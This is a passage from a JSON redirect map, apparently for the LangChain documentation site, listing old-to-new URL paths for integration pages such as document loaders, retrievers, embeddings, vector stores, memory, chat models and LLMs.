"/docs/integrations/document_loaders/telegram" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/tomarkdown.html", "destination": "/docs/integrations/document_loaders/tomarkdown" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/tomarkdown", "destination": "/docs/integrations/document_loaders/tomarkdown" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/toml.html", "destination": "/docs/integrations/document_loaders/toml" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/toml", "destination": "/docs/integrations/document_loaders/toml" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/trello.html", "destination": "/docs/integrations/document_loaders/trello" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/trello", "destination": "/docs/integrations/document_loaders/trello" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/twitter.html", "destination": "/docs/integrations/document_loaders/twitter" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/twitter", "destination": "/docs/integrations/document_loaders/twitter" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/unstructured_file.html", "destination": "/docs/integrations/document_loaders/unstructured_file" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/unstructured_file", "destination": "/docs/integrations/document_loaders/unstructured_file" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/url.html", "destination": "/docs/integrations/document_loaders/url" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/url", "destination": "/docs/integrations/document_loaders/url" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/weather.html", "destination": "/docs/integrations/document_loaders/weather" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/weather", "destination": "/docs/integrations/document_loaders/weather" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/web_base.html", "destination": "/docs/integrations/document_loaders/web_base" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/web_base", "destination": "/docs/integrations/document_loaders/web_base" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/whatsapp_chat.html", "destination": "/docs/integrations/document_loaders/whatsapp_chat" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/whatsapp_chat", "destination": "/docs/integrations/document_loaders/whatsapp_chat" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/wikipedia.html", "destination": "/docs/integrations/document_loaders/wikipedia" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/wikipedia", "destination": "/docs/integrations/document_loaders/wikipedia" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/xml.html", "destination": "/docs/integrations/document_loaders/xml" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/xml", "destination": "/docs/integrations/document_loaders/xml" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/youtube_audio.html", "destination": "/docs/integrations/document_loaders/youtube_audio" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/youtube_audio", "destination": "/docs/integrations/document_loaders/youtube_audio" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/youtube_transcript.html", "destination": "/docs/integrations/document_loaders/youtube_transcript" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/youtube_transcript", "destination": "/docs/integrations/document_loaders/youtube_transcript" }, { "source": "/en/latest/modules/indexes/text_splitters/examples/markdown_header_metadata.html", "destination": "/docs/modules/data_connection/document_transformers/text_splitters/markdown_header_metadata" }, { "source": "/en/latest/modules/indexes/text_splitters.html", "destination": "/docs/modules/data_connection/document_transformers/" }, { "source": "/en/latest/modules/indexes/retrievers/examples/chroma_self_query.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/chroma_self_query" }, { "source": "/en/latest/modules/indexes/retrievers/examples/self_query.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/pinecone" }, { "source": "/en/latest/modules/indexes/retrievers/examples/qdrant_self_query.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/qdrant_self_query" }, { "source": "/en/latest/modules/indexes/retrievers/examples/weaviate_self_query.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/weaviate_self_query" }, { "source": "/en/latest/modules/indexes/retrievers/examples/arxiv.html", "destination": "/docs/integrations/retrievers/arxiv" }, { "source": "/docs/modules/data_connection/retrievers/integrations/arxiv", "destination": "/docs/integrations/retrievers/arxiv" }, { "source": "/en/latest/modules/indexes/retrievers/examples/azure_cognitive_search.html", "destination": "/docs/integrations/retrievers/azure_cognitive_search" }, { "source": "/docs/modules/data_connection/retrievers/integrations/azure_cognitive_search", "destination": "/docs/integrations/retrievers/azure_cognitive_search" }, { "source": "/en/latest/modules/indexes/retrievers/examples/chatgpt-plugin.html", "destination": "/docs/integrations/retrievers/chatgpt-plugin" }, { "source": "/docs/modules/data_connection/retrievers/integrations/chatgpt-plugin", "destination": "/docs/integrations/retrievers/chatgpt-plugin" }, { "source": "/en/latest/modules/indexes/retrievers/examples/cohere-reranker.html", "destination": "/docs/integrations/retrievers/cohere-reranker" }, { "source": "/docs/modules/data_connection/retrievers/integrations/cohere-reranker", "destination": "/docs/integrations/retrievers/cohere-reranker" }, { "source": "/en/latest/modules/indexes/retrievers/examples/databerry.html", "destination": "/docs/integrations/retrievers/chaindesk" }, { "source": "/docs/modules/data_connection/retrievers/integrations/chaindesk", "destination": "/docs/integrations/retrievers/chaindesk" }, { "source": "/docs/modules/data_connection/retrievers/integrations/databerry", "destination": "/docs/integrations/retrievers/chaindesk" }, { "source": "/docs/modules/data_connection/retrievers/integrations/chaindesk", "destination": "/docs/integrations/retrievers/chaindesk" }, { "source": "/en/latest/modules/indexes/retrievers/examples/elastic_search_bm25.html", "destination": "/docs/integrations/retrievers/elastic_search_bm25" }, { "source": "/docs/modules/data_connection/retrievers/integrations/elastic_search_bm25", "destination": "/docs/integrations/retrievers/elastic_search_bm25" }, { "source": "/en/latest/modules/indexes/retrievers/examples/knn.html", "destination": "/docs/integrations/retrievers/knn" }, { "source": "/docs/modules/data_connection/retrievers/integrations/knn", "destination": "/docs/integrations/retrievers/knn" }, { "source": "/en/latest/modules/indexes/retrievers/examples/merger_retriever.html", "destination": "/docs/integrations/retrievers/merger_retriever" }, { "source": "/docs/modules/data_connection/retrievers/integrations/merger_retriever", "destination": "/docs/integrations/retrievers/merger_retriever" }, { "source": "/en/latest/modules/indexes/retrievers/examples/metal.html", "destination": "/docs/integrations/retrievers/metal" }, { "source": "/docs/modules/data_connection/retrievers/integrations/metal", "destination": "/docs/integrations/retrievers/metal" }, { "source": "/en/latest/modules/indexes/retrievers/examples/pinecone_hybrid_search.html", "destination": "/docs/integrations/retrievers/pinecone_hybrid_search" }, { "source": "/docs/modules/data_connection/retrievers/integrations/pinecone_hybrid_search", "destination": "/docs/integrations/retrievers/pinecone_hybrid_search" }, { "source": "/en/latest/modules/indexes/retrievers/examples/pubmed.html", "destination": "/docs/integrations/retrievers/pubmed" }, { "source": "/docs/modules/data_connection/retrievers/integrations/pubmed", "destination": "/docs/integrations/retrievers/pubmed" }, { "source": "/en/latest/modules/indexes/retrievers/examples/svm.html", "destination": "/docs/integrations/retrievers/svm" }, { "source": "/docs/modules/data_connection/retrievers/integrations/svm", "destination": "/docs/integrations/retrievers/svm" }, { "source": "/en/latest/modules/indexes/retrievers/examples/tf_idf.html", "destination": "/docs/integrations/retrievers/tf_idf" }, { "source": "/docs/modules/data_connection/retrievers/integrations/tf_idf", "destination": "/docs/integrations/retrievers/tf_idf" }, { "source": "/en/latest/modules/indexes/retrievers/examples/vespa.html", "destination": "/docs/integrations/retrievers/vespa" }, { "source": "/docs/modules/data_connection/retrievers/integrations/vespa", "destination": "/docs/integrations/retrievers/vespa" }, { "source": "/en/latest/modules/indexes/retrievers/examples/weaviate-hybrid.html", "destination": "/docs/integrations/retrievers/weaviate-hybrid" }, { "source": "/docs/modules/data_connection/retrievers/integrations/weaviate-hybrid", "destination": "/docs/integrations/retrievers/weaviate-hybrid" }, { "source": "/en/latest/modules/indexes/retrievers/examples/wikipedia.html", "destination": "/docs/integrations/retrievers/wikipedia" }, { "source": "/docs/modules/data_connection/retrievers/integrations/wikipedia", "destination": "/docs/integrations/retrievers/wikipedia" }, { "source": "/en/latest/modules/indexes/retrievers/examples/zep_memorystore.html", "destination": "/docs/integrations/retrievers/zep_memorystore" }, { "source": "/docs/modules/data_connection/retrievers/integrations/zep_memorystore", "destination": "/docs/integrations/retrievers/zep_memorystore" }, { "source": "/en/latest/modules/models/text_embedding/examples/aleph_alpha.html", "destination": "/docs/integrations/text_embedding/aleph_alpha" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/aleph_alpha", "destination": "/docs/integrations/text_embedding/aleph_alpha" }, { "source": "/en/latest/modules/models/text_embedding/examples/azureopenai.html", "destination": "/docs/integrations/text_embedding/azureopenai" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/azureopenai", "destination": "/docs/integrations/text_embedding/azureopenai" }, { "source": "/en/latest/modules/models/text_embedding/examples/amazon_bedrock.html", "destination": "/docs/integrations/text_embedding/bedrock" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/bedrock", "destination": "/docs/integrations/text_embedding/bedrock" }, { "source": "/en/latest/modules/models/text_embedding/examples/cohere.html", "destination": "/docs/integrations/text_embedding/cohere" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/cohere", "destination": "/docs/integrations/text_embedding/cohere" }, { "source": "/en/latest/modules/models/text_embedding/examples/dashscope.html", "destination": "/docs/integrations/text_embedding/dashscope" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/dashscope", "destination": "/docs/integrations/text_embedding/dashscope" }, { "source": "/en/latest/modules/models/text_embedding/examples/deepinfra.html", "destination": "/docs/integrations/text_embedding/deepinfra" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/deepinfra", "destination": "/docs/integrations/text_embedding/deepinfra" }, { "source": "/en/latest/modules/models/text_embedding/examples/elasticsearch.html", "destination": "/docs/integrations/text_embedding/elasticsearch" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/elasticsearch", "destination": "/docs/integrations/text_embedding/elasticsearch" }, { "source": "/en/latest/modules/models/text_embedding/examples/embaas.html", "destination": "/docs/integrations/text_embedding/embaas" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/embaas", "destination": "/docs/integrations/text_embedding/embaas" }, { "source": "/en/latest/modules/models/text_embedding/examples/fake.html", "destination": "/docs/integrations/text_embedding/fake" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/fake", "destination": "/docs/integrations/text_embedding/fake" }, { "source": "/en/latest/modules/models/text_embedding/examples/google_vertex_ai_palm.html", "destination": "/docs/integrations/text_embedding/google_vertex_ai_palm" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/google_vertex_ai_palm", "destination": "/docs/integrations/text_embedding/google_vertex_ai_palm" }, { "source": "/en/latest/modules/models/text_embedding/examples/huggingface_hub.html", "destination": "/docs/integrations/text_embedding/huggingfacehub" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/huggingfacehub", "destination": "/docs/integrations/text_embedding/huggingfacehub" }, { "source": "/en/latest/modules/models/text_embedding/examples/huggingface_instruct.html", "destination": "/docs/integrations/text_embedding/instruct_embeddings" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/instruct_embeddings", "destination": "/docs/integrations/text_embedding/instruct_embeddings" }, { "source": "/en/latest/modules/models/text_embedding/examples/jina.html", "destination": "/docs/integrations/text_embedding/jina" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/jina", "destination": "/docs/integrations/text_embedding/jina" }, { "source": "/en/latest/modules/models/text_embedding/examples/llamacpp.html", "destination": "/docs/integrations/text_embedding/llamacpp" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/llamacpp", "destination": "/docs/integrations/text_embedding/llamacpp" }, { "source": "/en/latest/modules/models/text_embedding/examples/minimax.html", "destination": "/docs/integrations/text_embedding/minimax" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/minimax", "destination": "/docs/integrations/text_embedding/minimax" }, { "source": "/en/latest/modules/models/text_embedding/examples/modelscope_hub.html", "destination": "/docs/integrations/text_embedding/modelscope_hub" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/modelscope_hub", "destination": "/docs/integrations/text_embedding/modelscope_hub" }, { "source": "/en/latest/modules/models/text_embedding/examples/mosaicml.html", "destination": "/docs/integrations/text_embedding/mosaicml" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/mosaicml", "destination": "/docs/integrations/text_embedding/mosaicml" }, { "source": "/en/latest/modules/models/text_embedding/examples/openai.html", "destination": "/docs/integrations/text_embedding/openai" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/openai", "destination": "/docs/integrations/text_embedding/openai" }, { "source": "/en/latest/modules/models/text_embedding/examples/sagemaker-endpoint.html", "destination": "/docs/integrations/text_embedding/sagemaker-endpoint" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/sagemaker-endpoint", "destination": "/docs/integrations/text_embedding/sagemaker-endpoint" }, { "source": "/en/latest/modules/models/text_embedding/examples/self-hosted.html", "destination": "/docs/integrations/text_embedding/self-hosted" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/self-hosted", "destination": "/docs/integrations/text_embedding/self-hosted" }, { "source": "/en/latest/modules/models/text_embedding/examples/sentence_transformers.html", "destination": "/docs/integrations/text_embedding/sentence_transformers" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/sentence_transformers", "destination": "/docs/integrations/text_embedding/sentence_transformers" }, { "source": "/en/latest/modules/models/text_embedding/examples/tensorflowhub.html", "destination": "/docs/integrations/text_embedding/tensorflowhub" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/tensorflowhub", "destination": "/docs/integrations/text_embedding/tensorflowhub" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/analyticdb.html", "destination": "/docs/integrations/vectorstores/analyticdb" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/analyticdb", "destination": "/docs/integrations/vectorstores/analyticdb" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/annoy.html", "destination": "/docs/integrations/vectorstores/annoy" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/annoy", "destination": "/docs/integrations/vectorstores/annoy" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/atlas.html", "destination": "/docs/integrations/vectorstores/atlas" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/atlas", "destination": "/docs/integrations/vectorstores/atlas" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/awadb.html", "destination": "/docs/integrations/vectorstores/awadb" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/awadb", "destination": "/docs/integrations/vectorstores/awadb" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/azuresearch.html", "destination": "/docs/integrations/vectorstores/azuresearch" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/azuresearch", "destination": "/docs/integrations/vectorstores/azuresearch" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/chroma.html", "destination": "/docs/integrations/vectorstores/chroma" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/chroma", "destination": "/docs/integrations/vectorstores/chroma" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/deeplake.html", "destination": "/docs/integrations/vectorstores/deeplake" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/deeplake", "destination": "/docs/integrations/vectorstores/deeplake" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/docarray_hnsw.html", "destination": "/docs/integrations/vectorstores/docarray_hnsw" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/docarray_hnsw", "destination": "/docs/integrations/vectorstores/docarray_hnsw" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/docarray_in_memory.html", "destination": "/docs/integrations/vectorstores/docarray_in_memory" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/docarray_in_memory", "destination": "/docs/integrations/vectorstores/docarray_in_memory" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/faiss.html", "destination": "/docs/integrations/vectorstores/faiss" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/faiss", "destination": "/docs/integrations/vectorstores/faiss" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/hologres.html", "destination": "/docs/integrations/vectorstores/hologres" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/hologres", "destination": "/docs/integrations/vectorstores/hologres" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/lancedb.html", "destination": "/docs/integrations/vectorstores/lancedb" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/lancedb", "destination": "/docs/integrations/vectorstores/lancedb" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/matchingengine.html", "destination": "/docs/integrations/vectorstores/matchingengine" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/matchingengine", "destination": "/docs/integrations/vectorstores/matchingengine" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/milvus.html", "destination": "/docs/integrations/vectorstores/milvus" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/milvus", "destination": "/docs/integrations/vectorstores/milvus" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/mongodb_atlas_vector_search.html", "destination": "/docs/integrations/vectorstores/mongodb_atlas_vector_search" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/mongodb_atlas_vector_search", "destination": "/docs/integrations/vectorstores/mongodb_atlas_vector_search" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/myscale.html", "destination": "/docs/integrations/vectorstores/myscale" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/myscale", "destination": "/docs/integrations/vectorstores/myscale" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/opensearch.html", "destination": "/docs/integrations/vectorstores/opensearch" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/opensearch", "destination": "/docs/integrations/vectorstores/opensearch" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/pgvector.html", "destination": "/docs/integrations/vectorstores/pgvector" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/pgvector", "destination": "/docs/integrations/vectorstores/pgvector" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/pinecone.html", "destination": "/docs/integrations/vectorstores/pinecone" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/pinecone", "destination": "/docs/integrations/vectorstores/pinecone" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/qdrant.html", "destination": "/docs/integrations/vectorstores/qdrant" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/qdrant", "destination": "/docs/integrations/vectorstores/qdrant" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/redis.html", "destination": "/docs/integrations/vectorstores/redis" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/redis", "destination": "/docs/integrations/vectorstores/redis" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/singlestoredb.html", "destination": "/docs/integrations/vectorstores/singlestoredb" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/singlestoredb", "destination": "/docs/integrations/vectorstores/singlestoredb" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/sklearn.html", "destination": "/docs/integrations/vectorstores/sklearn" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/sklearn", "destination": "/docs/integrations/vectorstores/sklearn" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/supabase.html", "destination": "/docs/integrations/vectorstores/supabase" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/supabase", "destination": "/docs/integrations/vectorstores/supabase" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/tair.html", "destination": "/docs/integrations/vectorstores/tair" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/tair", "destination": "/docs/integrations/vectorstores/tair" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/tigris.html", "destination": "/docs/integrations/vectorstores/tigris" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/tigris", "destination": "/docs/integrations/vectorstores/tigris" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/typesense.html", "destination": "/docs/integrations/vectorstores/typesense" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/typesense", "destination": "/docs/integrations/vectorstores/typesense" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/vectara.html", "destination": "/docs/integrations/vectorstores/vectara" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/vectara", "destination": "/docs/integrations/vectorstores/vectara" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/weaviate.html", "destination": "/docs/integrations/vectorstores/weaviate" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/weaviate", "destination": "/docs/integrations/vectorstores/weaviate" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/zilliz.html", "destination": "/docs/integrations/vectorstores/zilliz" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/zilliz", "destination": "/docs/integrations/vectorstores/zilliz" }, { "source": "/en/latest/modules/memory/examples/adding_memory.html", "destination": "/docs/modules/memory/how_to/adding_memory" }, { "source": "/en/latest/modules/memory/examples/adding_memory_chain_multiple_inputs.html", "destination": "/docs/modules/memory/how_to/adding_memory_chain_multiple_inputs" }, { "source": "/en/latest/modules/memory/examples/agent_with_memory.html", "destination": "/docs/modules/memory/how_to/agent_with_memory" }, { "source": "/en/latest/modules/memory/examples/agent_with_memory_in_db.html", "destination": "/docs/modules/memory/how_to/agent_with_memory_in_db" }, { "source": "/en/latest/modules/memory/examples/conversational_customization.html", "destination": "/docs/modules/memory/how_to/conversational_customization" }, { "source": "/en/latest/modules/memory/examples/custom_memory.html", "destination": "/docs/modules/memory/how_to/custom_memory" }, { "source": "/en/latest/modules/memory/types/kg.html", "destination": "/docs/modules/memory/how_to/kg" }, { "source": "/en/latest/modules/memory/examples/multiple_memory.html", "destination": "/docs/modules/memory/how_to/multiple_memory" }, { "source": "/en/latest/modules/memory/types/summary_buffer.html", "destination": "/docs/modules/memory/how_to/summary_buffer" }, { "source": "/en/latest/modules/memory/types/token_buffer.html", "destination": "/docs/modules/memory/how_to/token_buffer" }, { "source": "/en/latest/modules/memory/examples/cassandra_chat_message_history.html", "destination": "/docs/integrations/memory/cassandra_chat_message_history" }, { "source": "/docs/modules/memory/integrations/cassandra_chat_message_history", "destination": "/docs/integrations/memory/cassandra_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/dynamodb_chat_message_history.html", "destination": "/docs/integrations/memory/dynamodb_chat_message_history" }, { "source": "/docs/modules/memory/integrations/dynamodb_chat_message_history", "destination": "/docs/integrations/memory/dynamodb_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/entity_memory_with_sqlite.html", "destination": "/docs/integrations/memory/entity_memory_with_sqlite" }, { "source": "/docs/modules/memory/integrations/entity_memory_with_sqlite", "destination": "/docs/integrations/memory/entity_memory_with_sqlite" }, { "source": "/en/latest/modules/memory/examples/momento_chat_message_history.html", "destination": "/docs/integrations/memory/momento_chat_message_history" }, { "source": "/docs/modules/memory/integrations/momento_chat_message_history", "destination": "/docs/integrations/memory/momento_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/mongodb_chat_message_history.html", "destination": "/docs/integrations/memory/mongodb_chat_message_history" }, { "source": "/docs/modules/memory/integrations/mongodb_chat_message_history", "destination": "/docs/integrations/memory/mongodb_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/motorhead_memory.html", "destination": "/docs/integrations/memory/motorhead_memory" }, { "source": "/docs/modules/memory/integrations/motorhead_memory", "destination": "/docs/integrations/memory/motorhead_memory" }, { "source": "/en/latest/modules/memory/examples/motorhead_memory_managed.html", "destination": "/docs/integrations/memory/motorhead_memory_managed" }, { "source": "/docs/modules/memory/integrations/motorhead_memory_managed", "destination": "/docs/integrations/memory/motorhead_memory_managed" }, { "source": "/en/latest/modules/memory/examples/postgres_chat_message_history.html", "destination": "/docs/integrations/memory/postgres_chat_message_history" }, { "source": "/docs/modules/memory/integrations/postgres_chat_message_history", "destination": "/docs/integrations/memory/postgres_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/redis_chat_message_history.html", "destination": "/docs/integrations/memory/redis_chat_message_history" }, { "source": "/docs/modules/memory/integrations/redis_chat_message_history", "destination": "/docs/integrations/memory/redis_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/zep_memory.html", "destination": "/docs/integrations/memory/zep_memory" }, { "source": "/docs/modules/memory/integrations/zep_memory", "destination": "/docs/integrations/memory/zep_memory" }, { "source": "/en/latest/modules/models/chat/integrations/anthropic.html", "destination": "/docs/integrations/chat/anthropic" }, { "source": "/docs/modules/model_io/models/chat/integrations/anthropic", "destination": "/docs/integrations/chat/anthropic" }, { "source": "/en/latest/modules/models/chat/integrations/azure_chat_openai.html", "destination": "/docs/integrations/chat/azure_chat_openai" }, { "source": "/docs/modules/model_io/models/chat/integrations/azure_chat_openai", "destination": "/docs/integrations/chat/azure_chat_openai" }, { "source": "/en/latest/modules/models/chat/integrations/google_vertex_ai_palm.html", "destination": "/docs/integrations/chat/google_vertex_ai_palm" }, { "source": "/docs/modules/model_io/models/chat/integrations/google_vertex_ai_palm", "destination": "/docs/integrations/chat/google_vertex_ai_palm" }, { "source": "/en/latest/modules/models/chat/integrations/openai.html", "destination": "/docs/integrations/chat/openai" }, { "source": "/docs/modules/model_io/models/chat/integrations/openai", "destination": "/docs/integrations/chat/openai" }, { "source": "/en/latest/modules/models/chat/integrations/promptlayer_chatopenai.html", "destination": "/docs/integrations/chat/promptlayer_chatopenai" }, { "source": "/docs/modules/model_io/models/chat/integrations/promptlayer_chatopenai", "destination": "/docs/integrations/chat/promptlayer_chatopenai" }, { "source": "/en/latest/modules/models/llms/examples/async_llm.html", "destination": "/docs/modules/model_io/models/llms/how_to/async_llm" }, { "source": "/en/latest/modules/models/llms/examples/custom_llm.html", "destination": "/docs/modules/model_io/models/llms/how_to/custom_llm" }, { "source": "/en/latest/modules/models/llms/examples/fake_llm.html", "destination": "/docs/modules/model_io/models/llms/how_to/fake_llm" }, { "source": "/en/latest/modules/models/llms/examples/human_input_llm.html", "destination": "/docs/modules/model_io/models/llms/how_to/human_input_llm" }, { "source": "/en/latest/modules/models/llms/examples/llm_serialization.html", "destination": "/docs/modules/model_io/models/llms/how_to/llm_serialization" }, { "source": "/en/latest/modules/models/llms/examples/token_usage_tracking.html", "destination": "/docs/modules/model_io/models/llms/how_to/token_usage_tracking" }, { "source": "/en/latest/modules/models/llms/integrations/ai21.html", "destination": "/docs/integrations/llms/ai21" }, { "source": "/docs/modules/model_io/models/llms/integrations/ai21", "destination": "/docs/integrations/llms/ai21" }, { "source": "/en/latest/modules/models/llms/integrations/aleph_alpha.html", "destination": "/docs/integrations/llms/aleph_alpha" }, { "source": "/docs/modules/model_io/models/llms/integrations/aleph_alpha", "destination": "/docs/integrations/llms/aleph_alpha" }, { "source": "/en/latest/modules/models/llms/integrations/anyscale.html", "destination": "/docs/integrations/llms/anyscale" }, { "source": "/docs/modules/model_io/models/llms/integrations/anyscale", "destination": "/docs/integrations/llms/anyscale" }, { "source": "/en/latest/modules/models/llms/integrations/azure_openai_example.html", "destination": "/docs/integrations/llms/azure_openai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/azure_openai_example", "destination": "/docs/integrations/llms/azure_openai_example" }, { "source": "/en/latest/modules/models/llms/integrations/banana.html", "destination": "/docs/integrations/llms/banana" }, { "source": "/docs/modules/model_io/models/llms/integrations/banana", "destination": "/docs/integrations/llms/banana" }, { "source": "/en/latest/modules/models/llms/integrations/baseten.html", "destination": "/docs/integrations/llms/baseten" }, { "source": "/docs/modules/model_io/models/llms/integrations/baseten", "destination": "/docs/integrations/llms/baseten" }, { "source": "/en/latest/modules/models/llms/integrations/beam.html", "destination": "/docs/integrations/llms/beam" }, { "source": "/docs/modules/model_io/models/llms/integrations/beam", "destination": "/docs/integrations/llms/beam" }, { "source": "/en/latest/modules/models/llms/integrations/bedrock.html", "destination": "/docs/integrations/llms/bedrock" }, { "source": "/docs/modules/model_io/models/llms/integrations/bedrock", "destination": "/docs/integrations/llms/bedrock" }, { "source": "/en/latest/modules/models/llms/integrations/cerebriumai_example.html", "destination": "/docs/integrations/llms/cerebriumai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/cerebriumai_example", "destination": "/docs/integrations/llms/cerebriumai_example" }, { "source": "/en/latest/modules/models/llms/integrations/cohere.html", "destination": "/docs/integrations/llms/cohere" }, { "source": "/docs/modules/model_io/models/llms/integrations/cohere", "destination": "/docs/integrations/llms/cohere" }, { "source": "/en/latest/modules/models/llms/integrations/ctransformers.html", "destination": "/docs/integrations/llms/ctransformers" }, { "source": "/docs/modules/model_io/models/llms/integrations/ctransformers", "destination": "/docs/integrations/llms/ctransformers" }, { "source": "/en/latest/modules/models/llms/integrations/databricks.html", "destination": "/docs/integrations/llms/databricks" }, { "source": "/docs/modules/model_io/models/llms/integrations/databricks", "destination": "/docs/integrations/llms/databricks" }, { "source": "/en/latest/modules/models/llms/integrations/deepinfra_example.html", "destination": "/docs/integrations/llms/deepinfra_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/deepinfra_example", "destination": "/docs/integrations/llms/deepinfra_example" }, { "source": "/en/latest/modules/models/llms/integrations/forefrontai_example.html", "destination": "/docs/integrations/llms/forefrontai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/forefrontai_example", "destination": "/docs/integrations/llms/forefrontai_example" }, { "source": "/en/latest/modules/models/llms/integrations/google_vertex_ai_palm.html", "destination": "/docs/integrations/llms/google_vertex_ai_palm" }, { "source": "/docs/modules/model_io/models/llms/integrations/google_vertex_ai_palm", "destination": "/docs/integrations/llms/google_vertex_ai_palm" }, { "source": "/en/latest/modules/models/llms/integrations/gooseai_example.html", "destination": "/docs/integrations/llms/gooseai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/gooseai_example", "destination": "/docs/integrations/llms/gooseai_example" }, { "source": "/en/latest/modules/models/llms/integrations/huggingface_hub.html", "destination": "/docs/integrations/llms/huggingface_hub" }, { "source": 